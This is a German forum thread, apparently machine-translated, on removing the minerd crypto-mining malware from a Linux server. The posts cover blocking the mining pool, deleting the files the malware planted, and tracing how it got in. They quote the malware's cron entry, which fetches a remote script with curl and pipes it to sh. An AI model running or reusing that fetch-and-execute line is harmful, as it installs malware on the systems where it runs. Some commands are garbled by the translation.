Ich habe die Lösung zum Entfernen von minerd gefunden . Ich hatte das Glück, das eigentliche Skript zu finden, das verwendet wurde, um meinen Server zu infizieren. Alles, was ich tun musste, war, die von diesem Skript platzierten Elemente zu entfernen -
- Auf Vorschlag von Monkeyoto habe ich die gesamte Kommunikation mit dem Mining-Pool-Server blockiert -
iptables -A INPUT -s xmr.crypto-pool.fr -j DROPundiptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP. - Cron
*/15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | shentfernt ab/var/spool/cron/rootund/var/spool/cron/crontabs/root. - Das Verzeichnis
/opt/yamwurde entfernt . /root/.ssh/KHK75NEOiqentfernt .- Die Dateien
/opt/minerdgelöscht und/opt/KHK75NEOiq33. - Der Minerd-Prozess wurde gestoppt -
pkill minerd. - Stopp
lady-service lady stop.
Ich habe ps -eo pcpu,args --sort=-%cpu | head ausgeführt , top -bn2 |sed -n '7,25'p und ps aux | grep minerd Danach war die Malware nirgendwo zu sehen.
Ich muss noch herausfinden, wie es Zugriff auf das System erhalten hat, aber ich konnte es auf diese Weise deaktivieren.
Ihr erstes Ziel ist es (wenn Sie nicht neu installieren möchten), festzustellen, wie es überhaupt dorthin gelangt ist. Wenn der Angreifer schlau wäre, würde er "timestomp" ausführen, um die Daten von Binärdateien zu ändern. Das Minimieren von SSH bringt wenig, wenn Sie eine anfällige Version von Wordpress, Joomla oder etwas anderem verwenden. Beispielsweise gab es einen Nagios-Exploit, der von jemandem zum Ausführen von Minerd verwendet wurde. Also das Ziel... "Bestimmen was läuft, warum läuft es und ist es verwundbar?"
Zweitens möchten Sie die gesamte Kommunikation zum und vom Mining-Pool-Server blockieren:
iptables -A INPUT -S xmr.crypto-pool.fr -j DROP
Wie können Sie also feststellen, was modifiziert/geändert/anfällig war? Sie müssen Ihr System verstehen. Was macht es, warum macht es es und wer braucht Zugriff darauf. Ich würde meine Crontabs durchsuchen, um zu sehen, was, wenn irgendetwas beginnt. Sie könnten Folgendes ausführen:service --status-all um zu sehen, welche Dienste laufen/starten, und diese zu untersuchen. /opt/minerd scheint eine Datei zu sein, überprüfen Sie diese Datei und Sie könnten ein Skript erstellen, um nach allem zu suchen, das diese Datei aufruft, oder nach Dateien, die übereinstimmen, z. B.:find / | xargs grep -i minerd oder find / | xargs grep -i CHECKSUM_of_MINERD (Denken Sie daran, dass dies eine brutale Art der Suche in Dateien ist).
Drittens, überprüfen Sie Ihre Protokolle. Wenn Sie einen Webserver betreiben, würde ich mit Fehlerprotokollen (error_logs) beginnen und nach mehreren 403- und 404-Fehlern von einer Adresse suchen, gefolgt von einer erfolgreichen Verbindung in access_log. Überprüfen Sie den akzeptierten Pfad (z. B. 200:/var/www/nagios_or_something_vulnerable/config.php) und schauen Sie in das Verzeichnis. Es gibt viele Ansätze, um diese Informationen zu finden, aber KEINER hier kann Ihnen eine vollständige Antwort geben, da wir Informationen nur basierend auf der begrenzten Menge an Informationen, die Sie posten, ableiten können.
"Ich habe eine Datei namens Minerd am Start!" Suchen Sie nach dieser Datei. (find /|xargs grep -i minerd ). "Es verwendet diese seltsame Saite!" (find / |xargs grep -i 47TS1NQvebb3Feq ). "Es stellt eine Verbindung zu Port 8080 her!" (lsof -i | awk '/8080|http-alt/{print $1"\t"$2"\t"$8"\t"$9}' ). "Es verbindet sich mit dieser Adresse!" (lsof -i | grep xmr.crypto ... Sie haben jetzt eine Grundlinie der Dinge, die Sie tun können.
Das Problem ist, dass der Minerd wahrscheinlich die Nutzlast einer (anderen) Malware ist, sodass Sie nicht wirklich sagen können, was sonst noch auf dem System kompromittiert wurde. Möglicherweise befindet sich nichts anderes auf dem System und Sie werden jedes Mal neu infiziert, wenn Sie den Miner töten.
Alternativ gibt es einen Verwaltungs-/Dropper-Prozess, der eine Hintertür zu Ihrem Server geöffnet hat.
Am sichersten ist es, den Server neu zu erstellen. Aber wenn Sie es scannen möchten, können Sie Sophos Anti-Virus kostenlos von https://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-linux.aspx
herunterladen